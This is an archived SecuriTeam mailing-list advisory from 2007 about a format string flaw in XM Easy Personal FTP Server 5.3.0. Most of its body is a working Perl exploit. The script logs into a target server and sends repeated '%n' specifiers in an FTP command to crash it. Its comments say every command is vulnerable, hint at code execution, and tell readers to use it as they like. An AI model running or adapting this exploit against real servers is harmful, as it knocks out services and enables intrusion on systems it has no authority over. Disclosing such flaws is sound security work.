[EXPL] XM Easy Personal FTP Server Format String DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 1 Mar 2007 13:25:53 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
XM Easy Personal FTP Server Format String DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.dxm2008.com/> XM Easy Personal FTP Server - "Easy to Setup
Your FTP Server". Format string vulnerability in XM Easy FTP Server allows
denial of service condition.
DETAILS
Vulnerable Systems:
* XM Easy Personal FTP Server 5.3.0
Exploit:
#!/usr/bin/perl -w
#======================
# XM Easy Personal FTP Server 5.3.0 Multiple
vulnerabilities
# By Umesh Wanve
#======================
# Vendor: http://www.dxm2008.com/
#
# Date: 28-02-2007
#
#
# 1) Multiple format string attacks. Every command is vulnerable.
# With only single % also the server crashes.
#
# 2) Multiple buffer overflow occurs in commands if we fuzz the server(
Better way use ur own fuzzer)
#
#
# Code execution is possbile.
# This is latest version of FTP server.
#
# #########################
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "test";
my $pass = "test";
$exploit_string = "%n" x 10;
print ":: Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->command("ABOR ",$exploit_string); # Every command
is vulnerable. Use it what u like :)
print "Done!\n";
$ftp->quit;
ADDITIONAL INFORMATION
The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/3385>
http://www.milw0rm.com/exploits/3385
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] Plan 9 Kernel Local Exploit (devenv.c OTRUNC/pwrite)
- Next by Date: [UNIX] WordPress Multiple Script Injection Vulnerabilities
- Previous by thread: [EXPL] Plan 9 Kernel Local Exploit (devenv.c OTRUNC/pwrite)
- Next by thread: [UNIX] WordPress Multiple Script Injection Vulnerabilities
- Index(es):
Relevant Pages
- [NT] TwinFTP Server Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... TwinFTP Server is an FTP
server released by ... A vulnerability exists in TwinFTP server that allows a malicious
user ... (Securiteam) - [UNIX] Perdition IMAP Proxy str_vwrite Format String Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Perdition IMAP Proxy str_vwrite
Format String Vulnerability ... the actual number of format identifiers is compared
to ... (Securiteam) - [UNIX] CDE Mailer argv[0] Format String
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... CDE Mailer suffers from a format
string vulnerability due to improper ... Solaris implementation of CDE Mailer. ...
(Securiteam) - [NT] Pablo Software Solutions FTP Server File Disclosure
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... FTP server for Windows
98/NT/XP. ... This vulnerability allows checking whether a file exists on a remote ...
Using this you can know if the remote system is Windows NT/2000/XP ... (Securiteam) - [EXPL] Golden FTP Server Pro Buffer Overflow (USER, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... " Golden FTP Server is
a free Windows FTP server ... unsigned char *recvbuf; ... (Securiteam)